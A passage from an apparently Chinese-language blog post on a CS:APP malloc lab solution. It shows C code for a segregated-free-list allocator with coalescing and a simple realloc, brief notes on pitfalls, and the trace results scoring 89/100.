        insert_node_to_free_list(NEXT_BLKP(bp), remain_size);
    } else {
        PUT(HDRP(bp), PACK(origin_size, 1));
        PUT(FTRP(bp), PACK(origin_size, 1));
    }
    return;
}

/* find a fit free block (first fit) */
static void *find_fit(size_t size) {
    size_t list_num = size_to_type(size);
    for (int i = list_num; i < FREE_LIST_SIZE; ++i)
        if (free_lists[i] != NULL)
            for (void* tmp_ptr = free_lists[i]; tmp_ptr != NULL; tmp_ptr = BK(tmp_ptr))
                if (GET_SIZE(HDRP(tmp_ptr)) >= size)
                    return tmp_ptr;
    return NULL;
}

/*
 * coalesce - Coalesce free block next by
 */
static void *coalesce(void *bp) {
    size_t prev_alloc = GET_ALLOC(FTRP(PREV_BLKP(bp)));
    size_t next_alloc = GET_ALLOC(HDRP(NEXT_BLKP(bp)));
    size_t size = GET_SIZE(HDRP(bp));

    if (prev_alloc && next_alloc)
        return bp;

    /* coalesce with next block */
    if (!next_alloc && prev_alloc) {
        size_t next_size = GET_SIZE(HDRP(NEXT_BLKP(bp)));
        delete_node_from_free_list(bp, size);
        delete_node_from_free_list(NEXT_BLKP(bp), next_size);
        size += next_size;
        PUT(FTRP(NEXT_BLKP(bp)), PACK(size, 0));
        PUT(HDRP(bp), PACK(size, 0));
    }

    /* coalesce with prev block */
    if (!prev_alloc && next_alloc) {
        size_t prev_size = GET_SIZE(FTRP(PREV_BLKP(bp)));
        delete_node_from_free_list(bp, size);
        delete_node_from_free_list(PREV_BLKP(bp), prev_size);
        size += prev_size;
        PUT(HDRP(PREV_BLKP(bp)), PACK(size, 0));
        PUT(FTRP(bp), PACK(size, 0));
        bp = PREV_BLKP(bp);
    }

    /* coalesce with prev and next block */
    if (!prev_alloc && !next_alloc) {
        size_t prev_size = GET_SIZE(FTRP(PREV_BLKP(bp)));
        size_t next_size = GET_SIZE(HDRP(NEXT_BLKP(bp)));
        delete_node_from_free_list(bp, size);
        delete_node_from_free_list(PREV_BLKP(bp), prev_size);
        delete_node_from_free_list(NEXT_BLKP(bp), next_size);
        size += prev_size + next_size;
        PUT(HDRP(PREV_BLKP(bp)), PACK(size, 0));
        PUT(FTRP(NEXT_BLKP(bp)), PACK(size, 0));
        bp = PREV_BLKP(bp);
    };

    insert_node_to_free_list(bp, size);
    return bp;
}

/*
 * extend_heap - extend heap with a free block
 */
static void *extend_heap(size_t words) {
    char *bp;
    size_t size;
    /* Allocate and even number of words to maintain alignment */
    size = (words % 2) ? (words + 1) * WSIZE : words * WSIZE;
    if ((long)(bp = mem_sbrk(size)) == -1)
        return NULL;

    /* Initialize free block header/footer and the epilogue header */
    PUT(HDRP(bp), PACK(size, 0));
    PUT(FTRP(bp), PACK(size, 0));
    insert_node_to_free_list(bp, size);
    PUT(HDRP(NEXT_BLKP(bp)), PACK(0, 1));

    /* Coalesce if the previous block was free */
    return coalesce(bp);
}

/* 
 * mm_init - initialize the malloc package.
 */
int mm_init(void)
{
    /* Create the initial empty heap */
    if ((heap_listp = mem_sbrk(4 * WSIZE)) == (void *)-1)   /* sbrk() function returns the start address of the new area. */
        return -1;
    for (int i = 0; i < FREE_LIST_SIZE; ++i)
        free_lists[i] = NULL;
    PUT(heap_listp, 0);                                     /* Alignment */
    PUT(heap_listp + (1 * WSIZE), PACK(DSIZE, 1));          /* Prologue block's size is 8 and is always alloced */
    PUT(heap_listp + (2 * WSIZE), PACK(DSIZE, 1));
    PUT(heap_listp + (3 * WSIZE), PACK(0, 1));              /* Epilogue header */
    heap_listp += (2 * WSIZE);
    
    if (extend_heap(CHUNKSIZE/WSIZE) == NULL)
        return -1;
    return 0;
}

/* 
 * mm_malloc - Allocate a block by incrementing the brk pointer.
 *     Always allocate a block whose size is a multiple of the alignment.
 */
void *mm_malloc(size_t size)
{
    /* Ignore spurious requests */
    if (size <= 0)
        return NULL;
    if (size <= DSIZE)
        size = 2 * DSIZE;
    size_t newsize = size + DSIZE + ((-size) % DSIZE);
    void* bp;
    // int newsize = ALIGN(size + SIZE_T_SIZE);
    if ((bp = find_fit(newsize)) != NULL) {
        place(bp, newsize);
        return bp;
    }
    size_t extendsize = MAX(newsize, CHUNKSIZE);
    if ((bp = extend_heap(extendsize/WSIZE)) == NULL)
	   return NULL;
    place(bp, newsize);
    return bp;
}

/*
 * mm_free - Freeing a block does nothing.
 */
void mm_free(void *ptr)
{
    size_t size = GET_SIZE(HDRP(ptr));

    PUT(HDRP(ptr), PACK(size, 0));
    PUT(FTRP(ptr), PACK(size, 0));
    insert_node_to_free_list(ptr, size);
    coalesce(ptr);
}

在不优化 realloc 的情况下可以拿到 84 左右的分数，和 next fit 接近

简单优化一下 realloc，但由于 bug 实在太多，还是选择抄了一个只向后合并空闲块的 realloc（可以增加向前合并，但又得继续 debug，润了）

这里踩到了一个坑，书上给的 extend_heap() 读入的是 words，而很多地方习惯直接给 byte 长度计算的 size 了，所以一直报“未进行复制”的错

/*
 * mm_realloc - Implemented simply in terms of mm_malloc and mm_free
 */
void *mm_realloc(void *ptr, size_t size){
    void *nblock = ptr;
    int reamin;
    if (size == 0) return NULL;
    if (size <= DSIZE) size = 2 * DSIZE;
    else size = ALIGN(size + 8);
    if ((reamin = GET_SIZE(HDRP(ptr)) - size) >= 0){
        return ptr;
    }
    else if (!GET_ALLOC(HDRP(NEXT_BLKP(ptr))) || !GET_SIZE(HDRP(NEXT_BLKP(ptr)))){
        if ((reamin = GET_SIZE(HDRP(ptr)) + GET_SIZE(HDRP(NEXT_BLKP(ptr))) - size) < 0){
            if (extend_heap(MAX(-reamin, CHUNKSIZE)/WSIZE) == NULL)
                return NULL;
            reamin += MAX(-reamin, CHUNKSIZE);
        }
        delete_node_from_free_list(NEXT_BLKP(ptr), GET_SIZE(HDRP(NEXT_BLKP(ptr))));
        PUT(HDRP(ptr), PACK(size + reamin, 1));
        PUT(FTRP(ptr), PACK(size + reamin, 1));
    }
    else{
        nblock = mm_malloc(size);
        memcpy(nblock, ptr, GET_SIZE(HDRP(ptr)));
        mm_free(ptr);
    }
    return nblock;
}

测试结果：

Results for mm malloc:
trace  valid  util     ops      secs  Kops
 0       yes   98%    5694  0.000143 39818
 1       yes   94%    5848  0.000171 34259
 2       yes   98%    6648  0.000196 33936
 3       yes   99%    5380  0.000147 36499
 4       yes   66%   14400  0.000256 56338
 5       yes   89%    4800  0.000180 26667
 6       yes   86%    4800  0.000192 25065
 7       yes   55%   12000  0.000243 49322
 8       yes   51%   24000  0.000424 56630
 9       yes   99%   14401  0.000163 88513
10       yes   67%   14401  0.000128112684
Total          82%  112372  0.002242 50128

Perf index = 49 (util) + 40 (thru) = 89/100